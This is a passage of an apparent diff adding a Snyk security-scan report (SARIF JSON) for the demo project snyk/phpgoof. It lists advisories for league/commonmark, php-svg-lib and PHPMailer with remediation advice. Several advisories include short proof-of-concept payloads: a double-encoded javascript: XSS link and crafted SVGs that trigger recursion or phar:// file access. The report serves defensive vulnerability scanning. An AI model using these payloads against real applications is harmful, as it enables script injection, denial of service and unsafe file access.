+ "markdown": "* Package Manager: composer\n* Vulnerable module: league/commonmark\n* Introduced through: snyk/phpgoof@0.0.0 and league/commonmark@0.18.2\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › league/commonmark@0.18.2\n# Overview\n[league/commonmark](https://packagist.org/packages/league/commonmark) is a PHP-based Markdown parser which supports the full CommonMark spec. It is based on the CommonMark JS reference implementation.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). Malicious users can insert double-encoded HTML entities into their Markdown.\r\n\r\n# PoC:\r\nby `Colin O'Dell`\r\n\r\n`[XSS](javascript&amp;colon;alert%28&#039;XSS&#039;%29)`\r\n\r\nThis library would (correctly) unescape the `&amp`; entity to `&` during the parsing step. However, the renderer step would fail to properly re-escape the resulting `&colon;` string, thus producing the following malicious HTML output:\r\n\r\n`<p><a href=\"javascript&colon;alert('XSS')\">XSS</a></p>`\r\n\r\nBrowsers would interpret `&colon;` as a `:` character and allow the JS to be executed when the link is clicked.\n# Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `&lt`; and `>` can be coded as `&gt`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n## Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n## Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n## How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n# Remediation\nUpgrade `league/commonmark` to version 0.18.3 or higher.\n# References\n- [GitHub Commit](https://github.com/thephpleague/commonmark/commit/6f16c6eb893f760d3b4f9a03c94c62653c4ac829)\n- [GitHub Commit](https://github.com/thephpleague/commonmark/commit/edde218c179b6503d153035b3801f14a9ada542b)\n- [GitHub Commit](https://github.com/thephpleague/commonmark/commit/f1453b9fdb516436d79ff17af555f8d6e2321472)\n- [GitHub Issue](https://github.com/thephpleague/commonmark/issues/353)\n"
222
+ },
223
+ "properties": {
224
+ "tags": [
225
+ "security",
226
+ "CWE-79",
227
+ "composer"
228
+ ],
229
+ "cvssv3_baseScore": 6.5,
230
+ "security-severity": "6.5"
231
+ }
232
+ },
233
+ {
234
+ "id": "SNYK-PHP-LEAGUECOMMONMARK-174004",
235
+ "shortDescription": {
236
+ "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in league/commonmark"
237
+ },
238
+ "fullDescription": {
239
+ "text": "(CVE-2019-10010) league/commonmark@0.18.2"
240
+ },
241
+ "help": {
242
+ "text": "",
243
+ "markdown": "* Package Manager: composer\n* Vulnerable module: league/commonmark\n* Introduced through: snyk/phpgoof@0.0.0 and league/commonmark@0.18.2\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › league/commonmark@0.18.2\n# Overview\n[league/commonmark](https://packagist.org/packages/league/commonmark) is a PHP-based Markdown parser which supports the full CommonMark spec. It is based on the CommonMark JS reference implementation.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). Attackers may be able to insert unsafe links into HTML by using double-encoded HTML entities that are not properly escaped during rendering. \r\n\r\n**Note: This is a different vulnerability than CVE-2018-20583.**\n# Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `&lt`; and `>` can be coded as `&gt`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n## Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n## Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n## How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n# Remediation\nUpgrade `league/commonmark` to version 0.18.3 or higher.\n# References\n- [GitHub Commit](https://github.com/commonmark/commonmark.js/commit/c89b35c5fc99bdf1d2181f7f0c9fcb8a1abc27c8)\n- [GitHub Issue](https://github.com/thephpleague/commonmark/issues/353)\n- [GitHub Release](https://github.com/thephpleague/commonmark/releases/tag/0.18.3)\n"
244
+ },
245
+ "properties": {
246
+ "tags": [
247
+ "security",
248
+ "CWE-79",
249
+ "composer"
250
+ ],
251
+ "cvssv3_baseScore": 6.5,
252
+ "security-severity": "6.5"
253
+ }
254
+ },
255
+ {
256
+ "id": "SNYK-PHP-LEAGUECOMMONMARK-8493867",
257
+ "shortDescription": {
258
+ "text": "High severity - Inefficient Algorithmic Complexity vulnerability in league/commonmark"
259
+ },
260
+ "fullDescription": {
261
+ "text": "league/commonmark@0.18.2"
262
+ },
263
+ "help": {
264
+ "text": "",
265
+ "markdown": "* Package Manager: composer\n* Vulnerable module: league/commonmark\n* Introduced through: snyk/phpgoof@0.0.0 and league/commonmark@0.18.2\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › league/commonmark@0.18.2\n# Overview\n[league/commonmark](https://packagist.org/packages/league/commonmark) is a PHP-based Markdown parser which supports the full CommonMark spec. It is based on the CommonMark JS reference implementation.\n\nAffected versions of this package are vulnerable to Inefficient Algorithmic Complexity through the parsing of specially crafted Markdown inputs. An attacker can exhaust system resources and cause a denial of service.\r\n\r\n# Workaround \r\nThis vulnerability can be mitigated by setting very low `memory_limit` and `max_execution_time` PHP configurations to prevent runaway resource usage, implementing rate-limiting, bot protection, or other approaches to reduce the risk of simultaneous bad requests hitting your site, limiting the size of inputs fed into this library, and limiting the use of this library to trusted users.\n# Remediation\nUpgrade `league/commonmark` to version 2.6.0 or higher.\n# References\n- [GitHub Commit](https://github.com/thephpleague/commonmark/commit/9efa9145e3c1b1e2139896abfc278211eacfb40c)\n- [GitHub Issue](https://github.com/commonmark/commonmark.js/issues/129)\n- [GitHub Issue](https://github.com/commonmark/commonmark.js/issues/157)\n- [GitHub Issue](https://github.com/commonmark/commonmark.js/issues/172)\n"
266
+ },
267
+ "properties": {
268
+ "tags": [
269
+ "security",
270
+ "CWE-407",
271
+ "composer"
272
+ ],
273
+ "cvssv3_baseScore": 8.7,
274
+ "security-severity": "8.7"
275
+ }
276
+ },
277
+ {
278
+ "id": "SNYK-PHP-PHENXPHPSVGLIB-6125588",
279
+ "shortDescription": {
280
+ "text": "Medium severity - Uncontrolled Recursion vulnerability in phenx/php-svg-lib"
281
+ },
282
+ "fullDescription": {
283
+ "text": "(CVE-2023-50251) phenx/php-svg-lib@0.4.1"
284
+ },
285
+ "help": {
286
+ "text": "",
287
+ "markdown": "* Package Manager: composer\n* Vulnerable module: phenx/php-svg-lib\n* Introduced through: snyk/phpgoof@0.0.0, dompdf/dompdf@1.2.0 and others\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0 › phenx/php-svg-lib@0.4.1\n# Overview\n[phenx/php-svg-lib](https://packagist.org/packages/phenx/php-svg-lib) is a library to read, parse and export to PDF SVG files.\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion via the parsing of attributes in an SVG `use` tag, which can lead to infinite recursion. An attacker can cause a denial of service by crafting an SVG document that triggers this recursive behavior. This is only exploitable if the `id` attribute in the `use` tag is the same as the `href` or `xlink:href` link attribute, causing the parser to enter an infinite loop until memory resources are exhausted.\n# PoC\n```php\n\n<svg width=\"200\" height=\"200\"\n xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n <use id=\"selfref\" xlink:href=\"#selfref\" />\n</svg>\n\n```\n# Remediation\nUpgrade `phenx/php-svg-lib` to version 0.5.1 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/php-svg-lib/commit/88163cbe562d9b391b3a352e54d9c89d02d77ee0)\n"
288
+ },
289
+ "properties": {
290
+ "tags": [
291
+ "security",
292
+ "CWE-674",
293
+ "composer"
294
+ ],
295
+ "cvssv3_baseScore": 5.3,
296
+ "security-severity": "5.3"
297
+ }
298
+ },
299
+ {
300
+ "id": "SNYK-PHP-PHENXPHPSVGLIB-6125684",
301
+ "shortDescription": {
302
+ "text": "High severity - External Control of System or Configuration Setting vulnerability in phenx/php-svg-lib"
303
+ },
304
+ "fullDescription": {
305
+ "text": "(CVE-2023-50252) phenx/php-svg-lib@0.4.1"
306
+ },
307
+ "help": {
308
+ "text": "",
309
+ "markdown": "* Package Manager: composer\n* Vulnerable module: phenx/php-svg-lib\n* Introduced through: snyk/phpgoof@0.0.0, dompdf/dompdf@1.2.0 and others\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0 › phenx/php-svg-lib@0.4.1\n# Overview\n[phenx/php-svg-lib](https://packagist.org/packages/phenx/php-svg-lib) is a library to read, parse and export to PDF SVG files.\n\nAffected versions of this package are vulnerable to External Control of System or Configuration Setting due to improper sanitization of the `href` attribute from the `<use>` tag when it is merged with an `<image>` tag. An attacker can cause an unsafe file read that may lead to PHAR Deserialization vulnerability in PHP versions prior to 8 by manipulating the `href` attribute.\n\n# Workaround\n\nSystems utilizing php-svg-lib can implement input validation using logic similar to the following:\n\n```php\n$parser = xml_parser_create(\"utf-8\");\nxml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false);\nxml_set_element_handler(\n $parser,\n function ($parser, $name, $attributes) {\n if (strtolower($name) === \"image\" || strtolower($name) === \"use\") {\n $attributes = array_change_key_case($attributes, CASE_LOWER);\n $urls = [];\n $urls[] = $attributes[\"xlink:href\"] ?? \"\";\n $urls[] = $attributes[\"href\"] ?? \"\";\n foreach ($urls as $url) {\n if (!empty($url)) {\n // perform validation here\n }\n }\n }\n\n // include other tag/attribute validation\n },\n false\n);\n\nif (($fp = fopen($url, \"r\")) !== false) {\n while ($line = fread($fp, 8192)) {\n xml_parse($parser, $line, false);\n }\n fclose($fp);\n xml_parse($parser, \"\", true);\n}\nxml_parser_free($parser);\n```\n# PoC\n```php\n\n<svg width=\"200\" height=\"200\"\n xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n <image id=\"phar:///poc.phar\" xlink:href=\"file:///existing/safe/image.png\" />\n <use href=\"phar:///poc.phar\" width=\"500\" height=\"500\"/>\n</svg>\n\n```\n# Remediation\nUpgrade `phenx/php-svg-lib` to version 0.5.1 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/php-svg-lib/commit/08ce6a96d63ad7216315fae34a61c886dd2dc030)\n"
310
+ },
311
+ "properties": {
312
+ "tags": [
313
+ "security",
314
+ "CWE-15",
315
+ "composer"
316
+ ],
317
+ "cvssv3_baseScore": 8.3,
318
+ "security-severity": "8.3"
319
+ }
320
+ },
321
+ {
322
+ "id": "SNYK-PHP-PHENXPHPSVGLIB-6262046",
323
+ "shortDescription": {
324
+ "text": "Medium severity - External Control of File Name or Path vulnerability in phenx/php-svg-lib"
325
+ },
326
+ "fullDescription": {
327
+ "text": "(CVE-2024-25117) phenx/php-svg-lib@0.4.1"
328
+ },
329
+ "help": {
330
+ "text": "",
331
+ "markdown": "* Package Manager: composer\n* Vulnerable module: phenx/php-svg-lib\n* Introduced through: snyk/phpgoof@0.0.0, dompdf/dompdf@1.2.0 and others\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0 › phenx/php-svg-lib@0.4.1\n# Overview\n[phenx/php-svg-lib](https://packagist.org/packages/phenx/php-svg-lib) is a library to read, parse and export to PDF SVG files.\n\nAffected versions of this package are vulnerable to External Control of File Name or Path due to insufficient validation of the `font-family` attribute in SVG inline styles. Specifically, the library does not adequately verify that the `font-family` does not contain a PHAR URL. Additionally, the library fails to check if external references are permitted, which could lead to the bypass of restrictions or remote code execution in projects utilizing this library, should they not rigorously revalidate the `fontName` passed by the library.\n# PoC\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<svg xmlns:svg=\"http://www.w3.org/2000/svg\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"200\" height=\"200\">\r\n <text x=\"20\" y=\"35\" style=\"color:red;font-family:phar:///path/to/whatever.phar/blaklis;\">My</text>\r\n</svg>\r\n```\n# Remediation\nUpgrade `phenx/php-svg-lib` to version 0.5.2 or higher.\n# References\n- [GitHub Commit](https://github.com/dompdf/php-svg-lib/commit/732faa9fb4309221e2bd9b2fda5de44f947133aa)\n- [GitHub Commit](https://github.com/dompdf/php-svg-lib/commit/8ffcc41bbde39f09f94b9760768086f12bbdce42)\n"
332
+ },
333
+ "properties": {
334
+ "tags": [
335
+ "security",
336
+ "CWE-73",
337
+ "composer"
338
+ ],
339
+ "cvssv3_baseScore": 6.8,
340
+ "security-severity": "6.8"
341
+ }
342
+ },
343
+ {
344
+ "id": "snyk:lic:composer:phenx:php-svg-lib:LGPL-3.0",
345
+ "shortDescription": {
346
+ "text": "High severity - LGPL-3.0 license vulnerability in phenx/php-svg-lib"
347
+ },
348
+ "fullDescription": {
349
+ "text": "phenx/php-svg-lib@0.4.1"
350
+ },
351
+ "help": {
352
+ "text": "",
353
+ "markdown": "* Package Manager: composer\n* Module: phenx/php-svg-lib\n* Introduced through: snyk/phpgoof@0.0.0, dompdf/dompdf@1.2.0 and others\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0 › phenx/php-svg-lib@0.4.1\nLGPL-3.0 license"
354
+ },
355
+ "properties": {
356
+ "tags": [
357
+ "security",
358
+ "composer"
359
+ ],
360
+ "security-severity": "undefined"
361
+ }
362
+ },
363
+ {
364
+ "id": "SNYK-PHP-PHPMAILERPHPMAILER-1311001",
365
+ "shortDescription": {
366
+ "text": "Critical severity - Arbitrary Code Execution vulnerability in phpmailer/phpmailer"
367
+ },
368
+ "fullDescription": {
369
+ "text": "(CVE-2021-3603) phpmailer/phpmailer@6.4.1"
370
+ },
371
+ "help": {
372
+ "text": "",
373
+ "markdown": "* Package Manager: composer\n* Vulnerable module: phpmailer/phpmailer\n* Introduced through: snyk/phpgoof@0.0.0 and phpmailer/phpmailer@6.4.1\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › phpmailer/phpmailer@6.4.1\n# Overview\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. If the `$patternselect` parameter to `validateAddress()` is set to 'php' (the default, defined by `PHPMailer::$validator`), and the global namespace contains a function called `php`, it will be called in preference to the built-in validator of the same name. Mitigated in PHPMailer 6.5.0 by denying the use of simple strings as validator function names.\n# Remediation\nUpgrade `phpmailer/phpmailer` to version 6.5.0 or higher.\n# References\n- [GitHub Release](https://github.com/PHPMailer/PHPMailer/releases/tag/v6.5.0)\n"
374
+ },
375
+ "properties": {
376
+ "tags": [
377
+ "security",
378
+ "CWE-94",
379
+ "composer"
380
+ ],
381
+ "cvssv3_baseScore": 9.8,
382
+ "security-severity": "9.8"
383
+ }
384
+ },
385
+ {
386
+ "id": "SNYK-PHP-PHPMAILERPHPMAILER-1311002",
387
+ "shortDescription": {
388
+ "text": "Critical severity - Arbitrary Code Execution vulnerability in phpmailer/phpmailer"
389
+ },
390
+ "fullDescription": {
391
+ "text": "(CVE-2021-34551) phpmailer/phpmailer@6.4.1"
392
+ },
393
+ "help": {
394
+ "text": "",
395
+ "markdown": "* Package Manager: composer\n* Vulnerable module: phpmailer/phpmailer\n* Introduced through: snyk/phpgoof@0.0.0 and phpmailer/phpmailer@6.4.1\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › phpmailer/phpmailer@6.4.1\n# Overview\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. If the `$lang_path` parameter is passed unfiltered from user input, it can be set to a UNC path, and if an attacker is also able to persuade the server to load a file from that UNC path, a script file under their control may be executed. This vulnerability only applies to systems that resolve UNC paths, typically only Microsoft Windows. PHPMailer 6.5.0 mitigates this by no longer treating translation files as PHP code, but by parsing their text content directly. This approach avoids the possibility of executing unknown code while retaining backward compatibility.\n# Remediation\nUpgrade `phpmailer/phpmailer` to version 6.5.0 or higher.\n# References\n- [GitHub Release](https://github.com/PHPMailer/PHPMailer/releases/tag/v6.5.0)\n"
396
+ },
397
+ "properties": {
398
+ "tags": [
399
+ "security",
400
+ "CWE-94",
401
+ "composer"
402
+ ],
403
+ "cvssv3_baseScore": 9.8,
404
+ "security-severity": "9.8"
405
+ }
406
+ },
407
+ {
408
+ "id": "snyk:lic:composer:phpmailer:phpmailer:LGPL-2.1",
409
+ "shortDescription": {
410
+ "text": "High severity - LGPL-2.1 license vulnerability in phpmailer/phpmailer"
411
+ },
412
+ "fullDescription": {
413
+ "text": "phpmailer/phpmailer@6.4.1"
414
+ },
415
+ "help": {
416
+ "text": "",
417
+ "markdown": "* Package Manager: composer\n* Module: phpmailer/phpmailer\n* Introduced through: snyk/phpgoof@0.0.0 and phpmailer/phpmailer@6.4.1\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › phpmailer/phpmailer@6.4.1\nLGPL-2.1 license"
418
+ },
419
+ "properties": {
420
+ "tags": [
421
+ "security",
422
+ "composer"
423
+ ],
424
+ "security-severity": "undefined"
425
+ }
426
+ },
427
+ {
428
+ "id": "snyk:lic:composer:phenx:php-font-lib:LGPL-3.0",
429
+ "shortDescription": {
430
+ "text": "High severity - LGPL-3.0 license vulnerability in phenx/php-font-lib"
431
+ },
432
+ "fullDescription": {
433
+ "text": "phenx/php-font-lib@0.5.4"
434
+ },
435
+ "help": {
436
+ "text": "",
437
+ "markdown": "* Package Manager: composer\n* Module: phenx/php-font-lib\n* Introduced through: snyk/phpgoof@0.0.0, dompdf/dompdf@1.2.0 and others\n### Detailed paths\n* _Introduced through_: snyk/phpgoof@0.0.0 › dompdf/dompdf@1.2.0 › phenx/php-font-lib@0.5.4\nLGPL-3.0 license"
438
+ },
439
+ "properties": {
440
+ "tags": [
441
+ "security",
442
+ "composer"
443
+ ],
444
+ "security-severity": "undefined"
445
+ }
446
+ }
447
+ ]
448
+ }
449
+ },
450
+ "results": [
451
+ {
452
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-2428942",
453
+ "level": "error",
454
+ "message": {
455
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a high severity vulnerability."
456
+ },
457
+ "locations": [
458
+ {
459
+ "physicalLocation": {
460
+ "artifactLocation": {
461
+ "uri": "composer.json"
462
+ },
463
+ "region": {
464
+ "startLine": 1
465
+ }
466
+ },
467
+ "logicalLocations": [
468
+ {
469
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
470
+ }
471
+ ]
472
+ }
473
+ ]
474
+ },
475
+ {
476
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-2936790",
477
+ "level": "error",
478
+ "message": {
479
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a high severity vulnerability."
480
+ },
481
+ "locations": [
482
+ {
483
+ "physicalLocation": {
484
+ "artifactLocation": {
485
+ "uri": "composer.json"
486
+ },
487
+ "region": {
488
+ "startLine": 1
489
+ }
490
+ },
491
+ "logicalLocations": [
492
+ {
493
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
494
+ }
495
+ ]
496
+ }
497
+ ]
498
+ },
499
+ {
500
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-2953235",
501
+ "level": "warning",
502
+ "message": {
503
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a medium severity vulnerability."
504
+ },
505
+ "locations": [
506
+ {
507
+ "physicalLocation": {
508
+ "artifactLocation": {
509
+ "uri": "composer.json"
510
+ },
511
+ "region": {
512
+ "startLine": 1
513
+ }
514
+ },
515
+ "logicalLocations": [
516
+ {
517
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
518
+ }
519
+ ]
520
+ }
521
+ ]
522
+ },
523
+ {
524
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-3033151",
525
+ "level": "error",
526
+ "message": {
527
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a high severity vulnerability."
528
+ },
529
+ "locations": [
530
+ {
531
+ "physicalLocation": {
532
+ "artifactLocation": {
533
+ "uri": "composer.json"
534
+ },
535
+ "region": {
536
+ "startLine": 1
537
+ }
538
+ },
539
+ "logicalLocations": [
540
+ {
541
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
542
+ }
543
+ ]
544
+ }
545
+ ]
546
+ },
547
+ {
548
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-3261241",
549
+ "level": "error",
550
+ "message": {
551
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a high severity vulnerability."
552
+ },
553
+ "locations": [
554
+ {
555
+ "physicalLocation": {
556
+ "artifactLocation": {
557
+ "uri": "composer.json"
558
+ },
559
+ "region": {
560
+ "startLine": 1
561
+ }
562
+ },
563
+ "logicalLocations": [
564
+ {
565
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
566
+ }
567
+ ]
568
+ }
569
+ ]
570
+ },
571
+ {
572
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-3315269",
573
+ "level": "error",
574
+ "message": {
575
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a high severity vulnerability."
576
+ },
577
+ "locations": [
578
+ {
579
+ "physicalLocation": {
580
+ "artifactLocation": {
581
+ "uri": "composer.json"
582
+ },
583
+ "region": {
584
+ "startLine": 1
585
+ }
586
+ },
587
+ "logicalLocations": [
588
+ {
589
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
590
+ }
591
+ ]
592
+ }
593
+ ]
594
+ },
595
+ {
596
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-6124861",
597
+ "level": "error",
598
+ "message": {
599
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a high severity vulnerability."
600
+ },
601
+ "locations": [
602
+ {
603
+ "physicalLocation": {
604
+ "artifactLocation": {
605
+ "uri": "composer.json"
606
+ },
607
+ "region": {
608
+ "startLine": 1
609
+ }
610
+ },
611
+ "logicalLocations": [
612
+ {
613
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
614
+ }
615
+ ]
616
+ }
617
+ ]
618
+ },
619
+ {
620
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-8382096",
621
+ "level": "error",
622
+ "message": {
623
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a critical severity vulnerability."
624
+ },
625
+ "locations": [
626
+ {
627
+ "physicalLocation": {
628
+ "artifactLocation": {
629
+ "uri": "composer.json"
630
+ },
631
+ "region": {
632
+ "startLine": 1
633
+ }
634
+ },
635
+ "logicalLocations": [
636
+ {
637
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
638
+ }
639
+ ]
640
+ }
641
+ ]
642
+ },
643
+ {
644
+ "ruleId": "SNYK-PHP-DOMPDFDOMPDF-8382097",
645
+ "level": "error",
646
+ "message": {
647
+ "text": "This file introduces a vulnerable dompdf/dompdf package with a critical severity vulnerability."
648
+ },
649
+ "locations": [
650
+ {
651
+ "physicalLocation": {
652
+ "artifactLocation": {
653
+ "uri": "composer.json"
654
+ },
655
+ "region": {
656
+ "startLine": 1
657
+ }
658
+ },
659
+ "logicalLocations": [
660
+ {
661
+ "fullyQualifiedName": "dompdf/dompdf@1.2.0"
662
+ }
663
+ ]
664
+ }
665
+ ]
666
+ },
667
+ {
668
+ "ruleId": "SNYK-PHP-LEAGUECOMMONMARK-173996",
669
+ "level": "warning",
670
+ "message": {
671
+ "text": "This file introduces a vulnerable league/commonmark package with a medium severity vulnerability."
672
+ },
673
+ "locations": [
674
+ {
675
+ "physicalLocation": {
676
+ "artifactLocation": {
677
+ "uri": "composer.json"
678
+ },
679
+ "region": {
680
+ "startLine": 1
681
+ }
682
+ },
683
+ "logicalLocations": [
684
+ {
685
+ "fullyQualifiedName": "league/commonmark@0.18.2"
686
+ }
687
+ ]
688
+ }
689
+ ]
690
+ },
691
+ {
692
+ "ruleId": "SNYK-PHP-LEAGUECOMMONMARK-174004",
693
+ "level": "warning",
694
+ "message": {
695
+ "text": "This file introduces a vulnerable league/commonmark package with a medium severity vulnerability."
696
+ },
697
+ "locations": [
698
+ {
699
+ "physicalLocation": {
700
+ "artifactLocation": {
701
+ "uri": "composer.json"
702
+ },
703
+ "region": {
704
+ "startLine": 1
705
+ }
706
+ },
707
+ "logicalLocations": [
708
+ {
709
+ "fullyQualifiedName": "league/commonmark@0.18.2"
710
+ }
711
+ ]
712
+ }
713
+ ]
714
+ },
715
+ {
716
+ "ruleId": "SNYK-PHP-LEAGUECOMMONMARK-8493867",
717
+ "level": "error",
718
+ "message": {
719
+ "text": "This file introduces a vulnerable league/commonmark package with a high severity vulnerability."
720
+ },
721
+ "locations": [
722
+ {
723
+ "physicalLocation": {
724
+ "artifactLocation": {
725
+ "uri": "composer.json"
726
+ },
727
+ "region": {
728
+ "startLine": 1
729
+ }
730
+ },
731
+ "logicalLocations": [
732
+ {
733
+ "fullyQualifiedName": "league/commonmark@0.18.2"
734
+ }
735
+ ]
736
+ }
737
+ ]
738
+ },
739
+ {
740
+ "ruleId": "SNYK-PHP-PHENXPHPSVGLIB-6125588",
741
+ "level": "warning",
742
+ "message": {
743
+ "text": "This file introduces a vulnerable phenx/php-svg-lib package with a medium severity vulnerability."
744
+ },
745
+ "locations": [
746
+ {
747
+ "physicalLocation": {
748
+ "artifactLocation": {
749
+ "uri": "composer.json"
750
+ },
751
+ "region": {
752
+ "startLine": 1
753
+ }
754
+ },
755
+ "logicalLocations": [
756
+ {
757
+ "fullyQualifiedName": "phenx/php-svg-lib@0.4.1"
758
+ }
759
+ ]
760
+ }
761
+ ]
762
+ },
763
+ {
764
+ "ruleId": "SNYK-PHP-PHENXPHPSVGLIB-6125684",
765
+ "level": "error",
766
+ "message": {
767
+ "text": "This file introduces a vulnerable phenx/php-svg-lib package with a high severity vulnerability."
768
+ },
769
+ "locations": [
770
+ {
771
+ "physicalLocation": {
772
+ "artifactLocation": {
773
